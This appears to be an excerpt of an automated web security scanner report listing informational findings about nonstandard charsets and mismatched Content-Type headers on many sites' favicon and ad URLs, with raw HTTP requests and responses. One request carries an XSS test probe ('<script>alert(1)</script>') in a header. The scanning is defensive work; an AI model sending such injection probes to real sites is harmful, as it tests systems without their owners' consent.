<HTML><BODY>The URL you requested has been blocked. URL = www.jared-diamonds.com/favicon.ico</BODY></HTML>

30.5. http://www.manga32.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.manga32.com
Path:	/favicon.ico

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

windows-1251

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.manga32.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Tue, 03 May 2011 10:34:18 GMT
Content-Type: text/html
Content-Length: 516
Connection: keep-alive

<HTML><HEAD>

<TITLE>ERROR 404 - Page can not be found</TITLE>


<META http-equiv=Content-Type content="text/html; charset=windows-1251">
<base target="_blank">
...[SNIP]...

30.6. http://www.mbn.com.ua/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.mbn.com.ua
Path:	/favicon.ico

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

KOI8-R

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mbn.com.ua
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:30:32 GMT
Server: Apache/1.3.31 (Unix)
content-length: 62
Connection: close
Content-Type: text/html; charset=KOI8-R
Content-Language: ru

....., .. ..........
{path=&file=favicon.ico}{/file.html}

30.7. http://www.qianlong.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.qianlong.com
Path:	/favicon.ico

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

gb2312

Request

Response

30.8. http://www.save2pc.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.save2pc.com
Path:	/favicon.ico

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

windows-1251

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.save2pc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:44:36 GMT
Server: Apache/2.2.17 (FreeBSD) DAV/2 PHP/5.3.6 with Suhosin-Patch
X-Powered-By: PHP/5.3.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10180

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>save2pc</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251" >
<link type="text/css" rel="stylesheet" href="http://www.save2pc.com/css/styles.css" >
...[SNIP]...

31. Content type incorrectly stated previous next
There are 266 instances of this issue:

http://ads.pointroll.com/PortalServe/
http://afe.specificclick.net/
http://ar.voicefive.com/b/rc.pli
http://www.1280.com/favicon.ico
http://www.150fast.com/favicon.ico
http://www.1sky.org/favicon.ico
http://www.321gold.com/favicon.ico
http://www.3d3.com/favicon.ico
http://www.3reef.com/favicon.ico
http://www.4m.net/favicon.ico
http://www.670kboi.com/favicon.ico
http://www.6ass9.com/favicon.ico
http://www.977music.com/favicon.ico
http://www.about-salmonella.com/favicon.ico
http://www.aionarmory.com/favicon.ico
http://www.airgunsofarizona.com/favicon.ico
http://www.ajdesigner.com/favicon.ico
http://www.allaboutdrawings.com/favicon.ico
http://www.allegiance.com/favicon.ico
http://www.allgame.com/favicon.ico
http://www.amasci.com/favicon.ico
http://www.americanmedical-id.com/favicon.ico
http://www.antiqueradio.org/favicon.ico
http://www.arnottindustries.com/favicon.ico
http://www.asianmovielola.com/favicon.ico
http://www.auntbugs.com/favicon.ico
http://www.autozonepro.com/favicon.ico
http://www.avidpromedical.com/favicon.ico
http://www.bankserv.com/favicon.ico
http://www.bcpl.info/favicon.ico
http://www.best-running-tips.com/favicon.ico
http://www.bigagnes.com/favicon.ico
http://www.bigorrin.org/favicon.ico
http://www.blackgold.org/favicon.ico
http://www.blogxilla.com/favicon.ico
http://www.bloxnine.com/favicon.ico
http://www.booksshouldbefree.com/favicon.ico
http://www.breastfeeding.com/favicon.ico
http://www.broadbandsports.com/favicon.ico
http://www.brunswick.com/favicon.ico
http://www.cabinsusa.com/favicon.ico
http://www.careersandcolleges.com/favicon.ico
http://www.carsondellosa.com/favicon.ico
http://www.cash-advances-in-1-hour.com/favicon.ico
http://www.cashstore.com/favicon.ico
http://www.cayenne.com/favicon.ico
http://www.ccnow.com/favicon.ico
http://www.churchleaderinsights.com/favicon.ico
http://www.cirruscasino.net/favicon.ico
http://www.cityofheroes.com/favicon.ico
http://www.classicwordgames.com/favicon.ico
http://www.clevelandcountyschools.org/favicon.ico
http://www.clevelandgolf.com/favicon.ico
http://www.collegeotr.com/favicon.ico
http://www.coloring-page.com/favicon.ico
http://www.coloringcastle.com/favicon.ico
http://www.comfortmarket.com/favicon.ico
http://www.corestandards.org/favicon.ico
http://www.costcentral.com/favicon.ico
http://www.craigslist.at/favicon.ico
http://www.crowleymarine.com/favicon.ico
http://www.cyberfinder.com/favicon.ico
http://www.danomatic.com/favicon.ico
http://www.darkecountyfair.com/favicon.ico
http://www.davison.com/favicon.ico
http://www.deanza.edu/favicon.ico
http://www.dezignwithaz.com/favicon.ico
http://www.diesel.com/favicon.ico
http://www.diethealthclub.com/favicon.ico
http://www.direct.tv/favicon.ico
http://www.directboats.com/favicon.ico
http://www.dispatchinteractive.com/favicon.ico
http://www.downy.com/favicon.ico
http://www.dulcolaxusa.com/favicon.ico
http://www.dyessworldwide.com/favicon.ico
http://www.eaglesband.com/favicon.ico
http://www.educatedonline.net/favicon.ico
http://www.esa.int/favicon.ico
http://www.eslteachersboard.com/favicon.ico
http://www.everestcollege.edu/favicon.ico
http://www.expedient.com/favicon.ico
http://www.expertsatellite.com/favicon.ico
http://www.extremeoverclocking.com/favicon.ico
http://www.extremeskins.com/favicon.ico
http://www.facebook.com/extern/login_status.php
http://www.fantasiaofficial.com/favicon.ico
http://www.fastbooking.com/favicon.ico
http://www.fcbarcelona.cat/favicon.ico
http://www.fightpp.org/favicon.ico
http://www.findstudentloans.com/favicon.ico
http://www.flvsoft.com/favicon.ico
http://www.foofighters.com/favicon.ico
http://www.forconstructionpros.com/favicon.ico
http://www.foreclosurelistingsnationwide.com/favicon.ico
http://www.foundingfathers.info/favicon.ico
http://www.foxsportskansascity.com/common/appjs/~1300953231/s=main~thePlatform%5Eswfobject~thePlatform%5Eutil~thePlatform%5Eqos~thePlatform%5Eqos_mps~ugc/menz=1
http://www.foxyhousewives.com/favicon.ico
http://www.frbsf.org/favicon.ico
http://www.freeonlinesoftware.info/favicon.ico
http://www.freevistafiles.com/favicon.ico
http://www.gasparinutrition.com/favicon.ico
http://www.gavilan.edu/favicon.ico
http://www.gecu-ep.org/favicon.ico
http://www.getmyhomesvalue.com/favicon.ico
http://www.getrv.com/favicon.ico
http://www.giftcards.com/favicon.ico
http://www.glowfoto.com/favicon.ico
http://www.googleimages.com/favicon.ico
http://www.greatgardenplants.com/favicon.ico
http://www.greenway.org/favicon.ico
http://www.grubhub.com/favicon.ico
http://www.gruntsmilitary.com/favicon.ico
http://www.h2onews.org/favicon.ico
http://www.hamsterwatch.com/favicon.ico
http://www.have-fun-in-the-southwest.com/favicon.ico
http://www.healthiertalk.com/favicon.ico
http://www.healthy-oil-planet.com/favicon.ico
http://www.helloindianapolis.com/favicon.ico
http://www.helminc.com/favicon.ico
http://www.homebasedbusinessmatchingservice.com/favicon.ico
http://www.homesolutionsnews.us/favicon.ico
http://www.htmlgoodies.com/favicon.ico
http://www.hvacagent.com/favicon.ico
http://www.idg.com.au/favicon.ico
http://www.ihiremanufacturing.com/favicon.ico
http://www.ihireretail.com/favicon.ico
http://www.ihop.org/favicon.ico
http://www.ihousenet.com/favicon.ico
http://www.inyork.com/favicon.ico
http://www.ionchannels.org/favicon.ico
http://www.ipipeline.com/favicon.ico
http://www.juicing-for-health.com/favicon.ico
http://www.kencove.com/favicon.ico
http://www.khsaa.org/favicon.ico
http://www.kikkomanusa.com/favicon.ico
http://www.kinderthemes.com/favicon.ico
http://www.kjct8.com/favicon.ico
http://www.knife-depot.com/favicon.ico
http://www.kuryakyn.com/favicon.ico
http://www.laptopical.com/favicon.ico
http://www.lasalle.edu/favicon.ico
http://www.lasvegasdirect.com/favicon.ico
http://www.lattc.edu/favicon.ico
http://www.leeprecision.com/favicon.ico
http://www.lesboteensblog.com/favicon.ico
http://www.livingontheedge.org/favicon.ico
http://www.localhistories.org/favicon.ico
http://www.luggagepros.com/favicon.ico
http://www.lumens.com/favicon.ico
http://www.lyricsfire.com/favicon.ico
http://www.manchester2002-uk.com/favicon.ico
http://www.manycam.com/favicon.ico
http://www.marijuanaseedbanks.com/favicon.ico
http://www.marinas.com/favicon.ico
https://www.mavitunasecurity.com/support/checkupdate/
http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php
http://www.mbn.com.ua/favicon.ico
http://www.mbon.org/favicon.ico
http://www.mcc.edu/favicon.ico
http://www.meettheboss.tv/favicon.ico
http://www.memoryx.net/favicon.ico
http://www.mercadolivre.com.br/favicon.ico
http://www.mirandalambert.com/favicon.ico
http://www.mitsubishi-tv.com/favicon.ico
http://www.modernlinefurniture.com/favicon.ico
http://www.momsbreak.com/favicon.ico
http://www.mscd.edu/favicon.ico
http://www.myaddiction.com/favicon.ico
http://www.myfreedegree.com/favicon.ico
http://www.myhealthycat.com/favicon.ico
http://www.myoutofcontrolteen.com/favicon.ico
http://www.nascigs.com/favicon.ico
http://www.naturalhealers.com/favicon.ico
http://www.neaq.org/favicon.ico
http://www.newjerseyshore.com/favicon.ico
http://www.nextstat.com/favicon.ico
http://www.nikonians.org/favicon.ico
http://www.nin.com/favicon.ico
http://www.northstarmls.com/favicon.ico
http://www.oceana.org/favicon.ico
http://www.osbornewood.com/favicon.ico
http://www.osneaker.com/favicon.ico
http://www.parentsask.com/favicon.ico
http://www.pemonitorhosted.com/favicon.ico
http://www.photostockplus.com/favicon.ico
http://www.piworld.com/favicon.ico
http://www.pixela.co.jp/favicon.ico
http://www.plattformpartners.com/favicon.ico
http://www.poetrynation.com/favicon.ico
http://www.pokeorder.com/favicon.ico
http://www.popsugar.co.uk/favicon.ico
http://www.portalprogramas.com/favicon.ico
http://www.pponline.co.uk/favicon.ico
http://www.projectguitar.com/favicon.ico
http://www.purplepug.com/favicon.ico
http://www.quizasaurus.com/favicon.ico
http://www.racerxonline.com/favicon.ico
http://www.rauantiques.com/favicon.ico
http://www.realemoexposed.com/favicon.ico
http://www.realitytvcalendar.com/favicon.ico
http://www.redlandsdailyfacts.com/favicon.ico
http://www.remanufactured.com/favicon.ico
http://www.rugdoctor.com/favicon.ico
http://www.runningwarehouse.com/favicon.ico
http://www.sa-venues.com/favicon.ico
http://www.satellitesales.com/favicon.ico
http://www.scrapjazz.com/favicon.ico
http://www.servpro.com/favicon.ico
http://www.slipstick.com/favicon.ico
http://www.snaz75.com/favicon.ico
http://www.soundspectrum.com/favicon.ico
http://www.speedysigns.com/favicon.ico
http://www.sportsinjurybulletin.com/favicon.ico
http://www.srv17.com/favicon.ico
http://www.stanleyblackanddecker.com/favicon.ico
http://www.stepbystepcc.com/favicon.ico
http://www.stereophile.com/favicon.ico
http://www.stlbeacon.org/favicon.ico
http://www.stockingsjerk.com/favicon.ico
http://www.straight.com/favicon.ico
http://www.studentscholarshipsearch.com/favicon.ico
http://www.sub5zero.com/favicon.ico
http://www.superglossary.com/favicon.ico
http://www.svideo.com/favicon.ico
http://www.sztaki.hu/favicon.ico
http://www.tacori.com/favicon.ico
http://www.tatravelcenters.com/favicon.ico
http://www.tbd.com/favicon.ico
http://www.texasbowhunter.com/favicon.ico
http://www.theacc.com/favicon.ico
http://www.thefwa.com/favicon.ico
http://www.theminiaturespage.com/favicon.ico
http://www.theroyalforums.com/favicon.ico
http://www.thetelegram.com/favicon.ico
http://www.time-to-run.com/favicon.ico
http://www.tinymixtapes.com/favicon.ico
http://www.tnol.com/favicon.ico
http://www.top20cool.com/favicon.ico
http://www.travisa.com/favicon.ico
http://www.trulyhuge.com/favicon.ico
http://www.tsihomephone.com/favicon.ico
http://www.tulalipcasino.com/favicon.ico
http://www.uniqlo.com/favicon.ico
http://www.uniquedaily.com/favicon.ico
http://www.usa1ink.com/favicon.ico
http://www.usachurches.org/favicon.ico
http://www.usafootball.com/favicon.ico
http://www.usagardener.com/favicon.ico
http://www.uscareerinstitute.edu/favicon.ico
http://www.uschess.org/favicon.ico
http://www.verawang.com/favicon.ico
http://www.vividracing.com/favicon.ico
http://www.wate.net/favicon.ico
http://www.web-stat.net/favicon.ico
http://www.webreference.com/favicon.ico
http://www.wehaa-ads.com/favicon.ico
http://www.wellspan.org/favicon.ico
http://www.wholesalecostumeclub.com/favicon.ico
http://www.wildernesscollege.com/favicon.ico
http://www.windows-vista-update.com/favicon.ico
http://www.winhelponline.com/favicon.ico
http://www.woodsmith.com/favicon.ico
http://www.wowtattoos.com/favicon.ico
http://www.wtma.com/favicon.ico
http://www.wyyo.com/favicon.ico
http://www.x-tremegeek.com/favicon.ico

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

31.1. http://ads.pointroll.com/PortalServe/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Issue detail

The response contains the following Content-type statement:

Content-type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

31.2. http://afe.specificclick.net/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://afe.specificclick.net
Path:	/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

31.3. http://ar.voicefive.com/b/rc.pli previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ar.voicefive.com
Path:	/b/rc.pli

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction&n=ar_int_p87077372&1304455353874 HTTP/1.1
Host: ar.voicefive.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.specificmedia.com/serve/v=5;m=3;l=8610;c=143917;b=856866;ts=20110503114210;cxt=811200901:2280462
Cookie: ar_p87077372=exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&; BMX_G=method->-1,ts->1304437337; BMX_3PC=1

Response

31.4. http://www.1280.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.1280.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.1280.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:37:24 GMT
Server: Apache/2.2.9 (Unix) DAV/2 mod_ssl/2.2.9 OpenSSL/0.9.8h PHP/5.2.6 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Last-Modified: Mon, 16 Mar 2009 07:58:22 GMT
ETag: "2440d39-47e-46537d0786380"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain

............ .h.......(....... ..... ..............................................~...Qt..Ms..Lo..Qz..~..................................yQl..L...a...h...l...f...f..._...O..yQn.....................h>
...[SNIP]...

31.5. http://www.150fast.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.150fast.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.150fast.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:35:56 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 24 May 2010 23:42:16 GMT
ETag: "200801a-4486-4875f973f6600"
Accept-Ranges: bytes
Content-Length: 17542
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

......00.... ..%..F... .... ......%........ .. ...6........ .h....@..(...0...`..... ......%......................................................................@@@.@@@.@@@.@@@+@@@2@@@3@@@3@@@3@@@3@@
...[SNIP]...

31.6. http://www.1sky.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.1sky.org
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.1sky.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:13:02 GMT
Server: Apache
Content-Length: 45
Content-Type: text/html; charset=iso-8859-1

The requested file favicon.ico was not found.

31.7. http://www.321gold.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.321gold.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.321gold.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:38:06 GMT
Server: Apache/2.2.0 (Fedora)
Last-Modified: Tue, 18 Nov 2008 14:36:38 GMT
ETag: "560c8-37e-9f822980"
Accept-Ranges: bytes
Content-Length: 894
Connection: close
Content-Type: text/plain

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...

31.8. http://www.3d3.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.3d3.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.3d3.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:14:14 GMT
Server: Apache/1.3.27 (Unix) (Red-Hat/Linux) mod_gzip/1.3.26.1a mod_ssl/2.8.12 OpenSSL/0.9.6b DAV/1.0.3 mod_perl/1.29
Last-Modified: Tue, 26 Aug 2003 05:30:08 GMT
ETag: "ec2c5-364e-3f4af060"
Accept-Ranges: bytes
Content-Length: 13902
Connection: close
Content-Type: text/plain

..............h...v......... .h...............(...F
.. ..........n... .... ......... ...........$..00...........'..(....... ...........@.............................................................
...[SNIP]...

31.9. http://www.3reef.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.3reef.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.3reef.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:50:25 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 07 May 2005 21:20:03 GMT
ETag: "251a0df-e36-c51c06c0"
Accept-Ranges: bytes
Content-Length: 3638
Expires: Sat, 14 May 2011 20:00:00 GMT
Content-Type: text/plain; charset=UTF-8

..............h...&... ..............(....... ...........@.............................(.......^...........F...r...............?...........[.......q...................M...h...............P...D.......
...[SNIP]...

31.10. http://www.4m.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.4m.net
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.4m.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:35:27 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 04 Oct 2010 17:31:03 GMT
ETag: "11b0684-2796-e89143c0"
Accept-Ranges: bytes
Content-Length: 10134
Connection: close
Content-Type: text/plain; charset=UTF-8

..............(...f...........h....... .............. ........... ........ .h....... .... .........(....... .........................................................................................
...[SNIP]...

31.11. http://www.670kboi.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.670kboi.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.670kboi.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

31.12. http://www.6ass9.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.6ass9.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.6ass9.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 03 May 2011 10:33:36 GMT
Content-Type: text/plain
Connection: keep-alive
Last-Modified: Wed, 07 Dec 2005 05:45:41 GMT
ETag: "498fc3-47e-a9980b40"
Accept-Ranges: bytes
Content-Length: 1150

............ .h.......(....... ..... ..................................t..`Pa.acd.m`p.wjz.wjz.jZl._Ua.A@D.CEF.7.8.N/L..................b.................................OST.AFE.;3=.R=S..........]....
...[SNIP]...

31.13. http://www.977music.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.977music.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.977music.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 03 May 2011 10:52:38 GMT
Content-Type: text/plain
Connection: keep-alive
Last-Modified: Tue, 03 Mar 2009 14:24:10 GMT
ETag: "6559924-47e-b042f680"
Accept-Ranges: bytes
Content-Length: 1150

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

31.14. http://www.about-salmonella.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.about-salmonella.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a JPEG image.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.about-salmonella.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:09:56 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 25 Aug 2009 07:16:22 GMT
ETag: "679545-465-471f21c8efd80"
Accept-Ranges: bytes
Content-Length: 1125
Content-Type: text/plain
Vary: Accept-Encoding, User-Agent

......JFIF.....,.,........ . .."................................... ...................#... !"!..%'$ '.!! ........... .... ...........................
...[SNIP]...

31.15. http://www.aionarmory.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.aionarmory.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

31.16. http://www.airgunsofarizona.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.airgunsofarizona.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.airgunsofarizona.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

31.17. http://www.ajdesigner.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.ajdesigner.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ajdesigner.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

31.18. http://www.allaboutdrawings.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.allaboutdrawings.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=iso-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.allaboutdrawings.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:31:59 GMT
Server: Apache
Last-Modified: Tue, 19 Jan 2010 05:24:43 GMT
ETag: "d1333-37e-47d7daff07cc0"
Accept-Ranges: bytes
Content-Length: 894
Connection: close
Content-Type: text/plain; charset=iso-8859-1

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...

31.19. http://www.allegiance.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.allegiance.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.allegiance.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:54:08 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Tue, 30 Nov 2010 18:30:48 GMT
ETag: "4dc08a-10be-63346600"
Accept-Ranges: bytes
Content-Length: 4286
Connection: close
Content-Type: text/plain; charset=UTF-8

...... .... .........(... ...@..... .................................................... ...@...@...@...p./.../.../.../.../.../.../.../.../.../.....`...@...@...@................................ *.. *
...[SNIP]...

31.20. http://www.allgame.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.allgame.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.allgame.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 03:00:50 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 23 Jun 2009 02:38:02 GMT
ETag: "180922-47e-46cfae1289680"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8
Age: 27078
X-Cache: HIT from tul-1
